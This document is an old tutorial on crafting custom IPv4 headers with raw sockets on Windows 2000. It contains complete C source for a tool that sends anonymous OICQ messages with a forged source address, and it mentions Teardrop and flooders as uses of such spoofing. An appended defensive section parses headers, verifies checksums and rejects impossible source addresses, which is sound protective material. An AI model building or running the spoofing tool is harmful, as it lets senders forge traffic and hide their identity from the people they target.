Implementing User-Defined IP Headers in Windows 2000, with a Complete OICQsend Example

zhaozj2021-02-08  224

BY

Lonely swordsman

E-mail: Janker@371.net homepage: http://janker.126.com

First, introduction

Not long ago I wrote a "Personal Internet User Self-Protection Manual" that explained in detail how to build a secure personal system and what to watch out for when going online, with the aim of helping Internet users learn to protect themselves. In it I mentioned the question of hiding an IP address; because that article was written mainly for ordinary users, I did not go into detail. I did not expect so many readers to be interested and to write to me to discuss it, so I have put together this article and dedicate it to everyone.

Second, IP head structure

We know that all TCP/IP network data is carried in IP packets: the data is encapsulated into an IP datagram consisting of an IP header and the data. In general, network software always generates IP headers whose length is a multiple of 32-bit words, even if the header has to be padded with extra zeros. The IP header contains all the information needed to deliver the data carried in the IP packet. The structure of the IP header is described below:

Member                  Length (bits)  Description
Version                 4              IP header version number; currently IPv4, the latest is IPv6
Header Length           4              IP header length; if there are no special options, the IP header is always 20 bytes long
Type of Service         8              Service type; defines characteristics such as priority, delay, throughput and reliability of the transmission
Total Packet Length     16             IP packet length; if there are no special options, generally 20 bytes long
Identification          16             IP packet identifier; the host uses it to uniquely identify each datagram it sends
Flag                    3              IP fragmentation flags
Fragment Offset         13             IP fragmentation offset
Time to Live            8              Lifetime of the datagram on the network; the value is reduced each time the datagram passes through a router
Protocol                8              TCP/IP protocol type, such as: ICMP is 1, IGMP is 2, TCP is 6, UDP is 17, etc.
Header Checksum         16             Header checksum
Source IP Address       32             Source IP address
Destination IP Address  32             Destination IP address
Other                   ?              Other options
Data                    ?              Data

Defining your own IP header is a very useful thing to be able to do. For example, by changing the TOS priority and the TTL in the IP header you can give your packets stronger delivery capability and a longer lifetime, and by modifying the source IP address in the IP header you can hide the IP address of your machine, and so on. The well-known attack program "Teardrop" works by deliberately crafting fragmented IP packets that the system cannot handle, and SYN flooders and UDP flooders deceive the target by generating random source IP addresses.

Third, the principle of implementation

In general, custom IP headers are implemented by setting the IP_HDRINCL option with the socket library function setsockopt(). This is easy to do on UNIX and Linux platforms, but unfortunately the setsockopt() of the Winsock 1.1 and Winsock 2.0 libraries on Windows does not support the IP_HDRINCL option, so on Windows 9x/NT a custom IP header cannot be implemented through the Winsock library. It can of course be done by writing a virtual device driver, but that is more complicated. The arrival of Windows 2000 changes this situation: the Winsock 2.2 library of Windows 2000 fully supports the setsockopt() option IP_HDRINCL, so custom IP headers become easy to implement. The method is as follows:

SOCKET s;
BOOL bOpt;
int ret;

/* Raw socket; with IP_HDRINCL set, the caller supplies the IP header itself */
s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, WSA_FLAG_OVERLAPPED);
bOpt = TRUE;
ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));

Fourth, an example

To help everyone learn to construct their own IP header data as quickly as possible, here is a complete example. Its function is: given only the other party's IP address, it sends a "Hello!" message to the other party's OICQ, and because the IP header of the packet that is sent has been modified, the sender's IP address is completely hidden. In other words, it makes a completely anonymous OICQ sender; of course, if it is used with ill intent, the consequences ... The source code is as follows:

/***********************************************************************/
/* OICQSEND.C                                                          */
/* Compiled with Visual C++ 6.0 and debugged on Windows 2000 Advanced Server */
/* Created by janker@371.net 2000.8.28                                 */
/* Notice: arbitrarily modifying this program may produce an attack    */
/* program; you do so at your own risk                                 */
/***********************************************************************/

#pragma pack(1)

#define WIN32_LEAN_AND_MEAN

#include <winsock2.h>
#include <ws2tcpip.h>
#include <stdio.h>
#include <stdlib.h>
#include <time.h>

#define OICQ_MAX_PACKET 1024
#define OICQ_MAX_MSG    512
#define OICQ_MSG_LEN    45
#define SRC_IP          "127.0.0.1"
#define SRC_PORT        5277
#define DST_PORT        4000

/* IPv4 header without options (20 bytes) */
typedef struct ip_hdr
{
    unsigned char  ip_verlen;       /* version (4 bits) + header length (4 bits) */
    unsigned char  ip_tos;          /* type of service */
    unsigned short ip_totallength;  /* total packet length */
    unsigned short ip_id;           /* identification */
    unsigned short ip_offset;       /* flags + fragment offset */
    unsigned char  ip_ttl;          /* time to live */
    unsigned char  ip_protocol;     /* protocol (UDP is 17) */
    unsigned short ip_checksum;     /* header checksum */
    unsigned int   ip_srcaddr;      /* source IP address */
    unsigned int   ip_destaddr;     /* destination IP address */
} IP_HDR;

/* UDP header (8 bytes) */
typedef struct udp_hdr
{
    unsigned short src_portno;
    unsigned short dst_portno;
    unsigned short udp_length;
    unsigned short udp_checksum;
} UDP_HDR;

/* OICQ message payload, obtained from packet capture */
char strMessage[OICQ_MSG_LEN] = {
    0x02, 0x01, 0x07, 0x00, 0x78, 0x00, 0x00, 0x31, 0x30, 0x30, 0x30, 0x31, 0x1f, 0x30, 0x1f,
    0x30, 0x30, 0x1f, 0x32, 0x30, 0x30, 0x30, 0x2d, 0x30, 0x31, 0x2d, 0x30, 0x31, 0x1f, 0x30,
    0x30, 0x3a, 0x30, 0x30, 0x3a, 0x30, 0x30, 0x1f, 0x68, 0x65, 0x6c, 0x6c, 0x6f, 0x21, 0x03
};

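/* 16-bit one's-complement Internet checksum over size bytes */
USHORT checksum(USHORT *buffer, int size)
{
    unsigned long cksum = 0;

    while (size > 1)
    {
        cksum += *buffer++;
        size -= sizeof(USHORT);
    }
    if (size)
    {
        /* odd trailing byte */
        cksum += *(UCHAR *)buffer;
    }
    /* fold the carries back into the low 16 bits */
    cksum = (cksum >> 16) + (cksum & 0xffff);
    cksum += (cksum >> 16);
    return (USHORT)(~cksum);
}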

int main(int argc, char **argv)
{
    WSADATA wsd;
    SOCKET s;
    BOOL bOpt;
    struct sockaddr_in remote;
    IP_HDR ipHdr;
    UDP_HDR udpHdr;
    int ret;
    DWORD i;
    unsigned short iTotalSize,
                   iUdpSize,
                   iUdpChecksumSize,
                   iIPVersion,
                   iIPSize,
                   cksum = 0;
    char buf[OICQ_MAX_PACKET],
         *ptr = NULL;

    printf("Spoof OICQ Msg Sender - by Janker@371.net\n\n");
    if (argc != 2) {
        printf("usage: OICQSEND Destination_IP_Address");
        ExitProcess(1);
    }
    srand((unsigned)time(NULL));
    strMessage[5] = (char)rand();

    if (WSAStartup(MAKEWORD(2, 2), &wsd) != 0)
    {
        printf("WSAStartup() failed: %d\n", GetLastError());
        return -1;
    }
    s = WSASocket(AF_INET, SOCK_RAW, IPPROTO_UDP, NULL, 0, 0);
    if (s == INVALID_SOCKET)
    {
        printf("WSASocket() failed: %d\n", WSAGetLastError());
        return -1;
    }
    /* Tell the stack that the buffer passed to sendto() already contains the IP header */
    bOpt = TRUE;
    ret = setsockopt(s, IPPROTO_IP, IP_HDRINCL, (char *)&bOpt, sizeof(bOpt));
    if (ret == SOCKET_ERROR)
    {
        printf("setsockopt(IP_HDRINCL) failed: %d\n", WSAGetLastError());
        return -1;
    }

    /* Fill in the IP header */
    iTotalSize = sizeof(ipHdr) + sizeof(udpHdr) + OICQ_MSG_LEN;
    iIPVersion = 4;
    iIPSize = sizeof(ipHdr) / sizeof(unsigned long);
    ipHdr.ip_verlen = (iIPVersion << 4) | iIPSize;
    ipHdr.ip_tos = 0;
    ipHdr.ip_totallength = htons(iTotalSize);
    ipHdr.ip_id = 0;
    ipHdr.ip_offset = 0;
    ipHdr.ip_ttl = 128;
    ipHdr.ip_protocol = 0x11;
    ipHdr.ip_checksum = 0;
    ipHdr.ip_srcaddr = inet_addr(SRC_IP);
    ipHdr.ip_destaddr = inet_addr(argv[1]);

    /* Fill in the UDP header */
    iUdpSize = sizeof(udpHdr) + OICQ_MSG_LEN;
    udpHdr.src_portno = htons(SRC_PORT);
    udpHdr.dst_portno = htons(DST_PORT);
    udpHdr.udp_length = htons(iUdpSize);
    udpHdr.udp_checksum = 0;

    /* Build the UDP pseudo-header, UDP header and data in buf to compute the UDP checksum */
    iUdpChecksumSize = 0;
    ptr = buf;
    ZeroMemory(buf, OICQ_MAX_PACKET);
    memcpy(ptr, &ipHdr.ip_srcaddr, sizeof(ipHdr.ip_srcaddr));
    ptr += sizeof(ipHdr.ip_srcaddr);
    iUdpChecksumSize += sizeof(ipHdr.ip_srcaddr);
    memcpy(ptr, &ipHdr.ip_destaddr, sizeof(ipHdr.ip_destaddr));
    ptr += sizeof(ipHdr.ip_destaddr);
    iUdpChecksumSize += sizeof(ipHdr.ip_destaddr);
    ptr++;                          /* zero byte of the pseudo-header */
    iUdpChecksumSize += 1;
    memcpy(ptr, &ipHdr.ip_protocol, sizeof(ipHdr.ip_protocol));
    ptr += sizeof(ipHdr.ip_protocol);
    iUdpChecksumSize += sizeof(ipHdr.ip_protocol);
    memcpy(ptr, &udpHdr.udp_length, sizeof(udpHdr.udp_length));
    ptr += sizeof(udpHdr.udp_length);
    iUdpChecksumSize += sizeof(udpHdr.udp_length);
    memcpy(ptr, &udpHdr, sizeof(udpHdr));
    ptr += sizeof(udpHdr);
    iUdpChecksumSize += sizeof(udpHdr);
    for (i = 0; i < OICQ_MSG_LEN; i++, ptr++)
        *ptr = strMessage[i];
    iUdpChecksumSize += OICQ_MSG_LEN;
    cksum = checksum((USHORT *)buf, iUdpChecksumSize);
    udpHdr.udp_checksum = cksum;

    /* Assemble the packet to send: IP header, UDP header, message */
    ZeroMemory(buf, OICQ_MAX_PACKET);
    ptr = buf;
    memcpy(ptr, &ipHdr, sizeof(ipHdr));
    ptr += sizeof(ipHdr);
    memcpy(ptr, &udpHdr, sizeof(udpHdr));
    ptr += sizeof(udpHdr);
    memcpy(ptr, strMessage, OICQ_MSG_LEN);

    remote.sin_family = AF_INET;
    remote.sin_port = htons(DST_PORT);
    remote.sin_addr.s_addr = inet_addr(argv[1]);

    ret = sendto(s, buf, iTotalSize, 0, (SOCKADDR *)&remote, sizeof(remote));
    if (ret == SOCKET_ERROR)
        printf("sendto() failed: %d\n", WSAGetLastError());
    else
        printf("Send O.K.!");

    closesocket(s);
    WSACleanup();
    return 0;
}

The complete source program and EXE file can be downloaded as the compressed package OICQSEND.ZIP
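As an added example (not part of the original article or its program), this is how a receiver or network sensor would inspect such a header: it parses the fixed IPv4 header described in the table in section two, verifies the header checksum, and flags source addresses, such as the 127.0.0.1 that SRC_IP sets, which can never be valid on a packet arriving from the network. The names parse_ipv4, is_martian_source and SAMPLE_HDR are illustrative, and the sample header bytes are constructed.

```c
#include <stddef.h>
#include <stdint.h>

struct ipv4_info {               /* fields from the fixed 20-byte header */
    uint8_t  version, ihl, ttl, protocol;
    uint16_t total_length;
    uint32_t src, dst;           /* host byte order */
};

/* Constructed sample: UDP, TTL 128, length 73, 127.0.0.1 -> 192.0.2.10 */
static const uint8_t SAMPLE_HDR[20] = {
    0x45, 0x00, 0x00, 0x49, 0x00, 0x00, 0x00, 0x00, 0x80, 0x11,
    0xf9, 0x98, 0x7f, 0x00, 0x00, 0x01, 0xc0, 0x00, 0x02, 0x0a };

/* One's-complement sum (RFC 1071); over a valid header the result is 0. */
static uint16_t inet_checksum(const uint8_t *p, size_t len)
{
    uint32_t sum = 0;
    for (; len > 1; p += 2, len -= 2) sum += (uint32_t)((p[0] << 8) | p[1]);
    if (len) sum += (uint32_t)(p[0] << 8);
    while (sum >> 16) sum = (sum & 0xFFFF) + (sum >> 16);
    return (uint16_t)~sum;
}

static uint32_t be32(const uint8_t *p)   /* big-endian 32-bit load */
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}

/* 0 = parsed, -1 = truncated or malformed, -2 = header checksum mismatch */
int parse_ipv4(const uint8_t *pkt, size_t len, struct ipv4_info *out)
{
    if (len < 20) return -1;
    out->version = pkt[0] >> 4;
    out->ihl = pkt[0] & 0x0F;
    if (out->version != 4 || out->ihl < 5 || (size_t)out->ihl * 4 > len) return -1;
    out->total_length = (uint16_t)((pkt[2] << 8) | pkt[3]);
    if (out->total_length < out->ihl * 4) return -1;
    out->ttl = pkt[8]; out->protocol = pkt[9];
    out->src = be32(pkt + 12); out->dst = be32(pkt + 16);
    return inet_checksum(pkt, (size_t)out->ihl * 4) == 0 ? 0 : -2;
}

/* Source addresses that are never valid on a packet received off the wire. */
int is_martian_source(uint32_t src)
{
    return (src >> 24) == 127 || (src >> 24) == 0      /* loopback, "this network" */
        || (src >> 28) == 0xE || src == 0xFFFFFFFFu;   /* multicast, broadcast */
}
```

A forged header still passes the checksum test, because the checksum only detects corruption; it is the source-address check that rejects the packet, which is the same filtering routers apply at the network edge.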

Fifth, afterword

The OICQ data in this article's example is based on analysis with the "Network Monitor" of Windows 2000, which is a good network packet analysis tool. I hope everyone can make good use of it.

bibliography:

"Network Programming for Microsoft Windows", author: Jim Ohlund, Microsoft Press.
